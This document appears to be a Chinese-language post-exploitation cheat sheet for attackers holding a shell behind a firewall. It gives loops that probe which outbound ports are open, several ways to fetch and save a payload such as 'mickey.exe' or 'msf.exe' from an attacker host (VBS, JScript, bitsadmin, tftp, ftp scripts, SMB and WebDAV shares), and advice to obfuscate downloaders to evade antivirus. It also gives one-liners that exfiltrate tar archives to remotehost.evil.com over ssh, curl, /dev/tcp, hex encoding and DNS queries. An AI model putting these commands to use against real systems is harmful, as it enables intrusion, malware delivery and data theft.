有時候有防火墻,你也不知道哪個端口能出來,你只有SHELL,咋判斷什么端口能出來呢?如果你是在WIN VISTA以下版本,那么用下面的命令可以啦
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b telnet 1.2.3.4 %i")
用TELNET不停的連接你的1-65535端口,你本地開個TCPDUMP就行了,如果連通了,就OK了.
如果TCP封鎖了,可以用UDP
FOR /L %i IN (1,1,65535) DO (cmd /c "start /b nslookup -port=%i wooyun.org 1.2.3.4")
這個就更慢了,但是有效,其中的wooyun.org是你可以設置自己的動態域名
如果是VISTA以后的版本,自帶有POWERSHELL:
下面分別是走TCP和UDP的
function sT($IP,$Port) {$Address = [system.net.IPAddress]::Parse($IP);$End = New-Object System.Net.IPEndPoint $address, $port;$Saddrf = [System.Net.Sockets.AddressFamily]::InterNetwork;$Stype = [System.Net.Sockets.SocketType]::Stream;$Ptype = [System.Net.Sockets.ProtocolType]::TCP;$Sock = New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype;$Sock.TTL = 26;try { $sock.Connect($End);[Byte[]] $Message = [char[]]"w00tw00t";$Sent = $Sock.Send($Message);$sock.EndConnect($Connect)} catch {};$Sock.Close();};1..65535 | %{ sT -IP "1.2.3.4" -Port $_ }
function sU($IP, [int]$Port){$Address = [system.net.IPAddress]::Parse($IP);$End = New-Object System.Net.IPEndPoint($Address, $port);$Saddrf=[System.Net.Sockets.AddressFamily]::InterNetwork;$Stype=[System.Net.Sockets.SocketType]::Dgram;$Ptype=[System.Net.Sockets.ProtocolType]::UDP;$Sock=New-Object System.Net.Sockets.Socket $saddrf, $stype, $ptype;$Sock.TTL = 26;$sock.Connect($end);$Enc=[System.Text.Encoding]::ASCII;$Message = "w00tw00t";$Buffer=$Enc.GetBytes($Message);$Sent=$Sock.Send($Buffer);}; 1..65535 | %{ sU -IP "1.2.3.4" -Port $_ }
如果是VISTA以下版本,可以用TFTP/FTP/TELNET,這個網上文章很多的了,另外如果你搞的是國外的,不要忘記SMB,如果能走HTTP的80,可以用VBS的ADODB.Stream來下載,不過這個已經被很多殺毒軟件殺了,編寫的時候編碼混淆下就行了.但不保證能過主動防御,還是少用,另外zzzEVAzzz的那個Any2Bat可以直接傳文件,就是體積有限制,不能傳太大的文件,傳小馬的話應該可以了.如果能走80的話,還可以嘗試下WEBDAV,WIN Vista以后就方便了,直接用內建命令bitsadmin就行了
code 1:
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") : objXMLHTTP.open "GET", "http://192.168.1.43/mickey.exe", false : objXMLHTTP.send() : Set objADOStream = CreateObject("ADODB.Stream") : objADOStream.Open : objADOStream.Type = 1 : objADOStream.Write objXMLHTTP.ResponseBody : objADOStream.Position = 0 : Set objFSO = Createobject("Scripting.FileSystemObject") : objADOStream.SaveToFile "C:\msf.exe":objADOStream.Close
code 2:
function HTTPGetDownload(url, file) {
var http = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
http.open("GET", url);
http.send();
var stream = new ActiveXObject("ADODB.Stream");
stream.type = 1;
stream.open();
stream.write(http.responseBody);
stream.saveToFile(file,2); }
HTTPGetDownload("http://1.2.3.4/mickey.exe", "mickey.exe");
code 3:
bitsadmin /rawretrun /transfer getfile http://pentest.cc/mickey.exe c:\mickey.exe
code 4:
tftp –i 1.2.3.4 GET mickey.exe
code 5:
echo open 1.2.3.4 > x&echo user 2 2 >> x &echo get mickey.exe >> x &echo quit >> x &ftp -n -s:x
情景假設,我是LINUX要傳文件到WIN上去
首先我在本地的LINUX上用NC執行
nc -lvp 23 < mickey.txt
然后我在WIN上執行
telnet 我的LINUX主機的IP -f c:\mickey.txt
這樣就把我linux主機上的mickey.txt文件拷貝到win主機的c盤下了
情景假設,我是LINUX要傳文件到WIN上去
首先我在本地的LINUX上配置好SAMBA服務
nano /etc/samba/smb.conf
[hack]
??? comment = File Server Share
??? path = /tmp/
??? browseable = yes
??? writable = yes
??? guest ok = yes
??? read only = no
??? create mask = 0755
service samba start
然后我在WIN上執行
C:\>net use z: \\192.168.10.80\hack
copy z:\mickey.exe C:\mickey.exe
net use o: "http://192.168.200.18/uploads"
copy z:\mickey.exe C:\mickey.exe
也可以走HTTPS
net use o: "https://192.168.200.18/uploads"
但是需要在主機上開啟WebClient服務,才能成功
net start WebClient
[email protected],主攻LINUX
當我們想要把一個服務器里面的數據打包備份到另一個服務器的時候,這些命令可能會有幫助。
一邊tar一邊通過ssh傳到服務器并且自動解壓縮,最后會得到遠程服務器上文件夾的一份完美備份,并且在目標服務器上不會寫入任何文件。
tar zcf - /some/localfolder | ssh remotehost.evil.com "cd /some/path/name; tar zxpf -"
通過ssh隧道同步,要求是本地服務器要安裝了rsync
rsync -aH localhost remotehost.evil.com:/some/path/name
假如ssh默認的22端口被封,那么你可以用ssh -p 或者 rysnc --port指定端口,比如可以把ssh服務器開到80或者443端口。
如果連SSH協議都被封了呢,怎么換端口都沒用怎么辦?別怕,我們可以把數據通過https發送:
tar zcf - localfolder | curl -F "data=@-" https://remotehost.evil.com/script.php
curl -F 表示通過偽表單用Post方式發送數據
當然,你還要在本地建一個script.php用來收取數據然后寫入到文件才行,并且web服務器要支持ssl并且有https證書。
不過curl在很多linux發行版里面都沒有默認安裝,所以還是有時候還是不太靠譜。
那么現在不能用ssh也不能用curl,那怎么辦?
tar zcf - localfolder >/dev/tcp/remotehost.evil.com/443
大家看這個方式是不是有點眼熟?沒錯,就是和彈shell的方法差不多,只不過這次我們用來傳送文件。
效果和用nc傳文件是一樣的。假如遠程服務器和網絡還有內容檢測的話,我們還可以對文件進行一些編碼來混淆,比如用xxd命令轉換成16進制 dump
tar zcf - localfolder | xxd -p >/dev/tcp/remotehost.evil.com/443
本地服務器可以用xxd -r來還原源文件
其實除了xxd,用 base64也不錯,就是有點明顯……
更奇葩的方法,用DNS來傳送數據:
tar zcf - localfolder | xxd -p -c 16 |
??? while read line; do host $line.domain.com remotehost.evil.com; done
把打包后的數據用16進制編碼,每行16字節,這樣在通過dns發送到時候就不會因為超長導致出錯。然后我們限制每次只發送1個ping數據包,減少發送時間。至于怎么還原,那就要看你的了。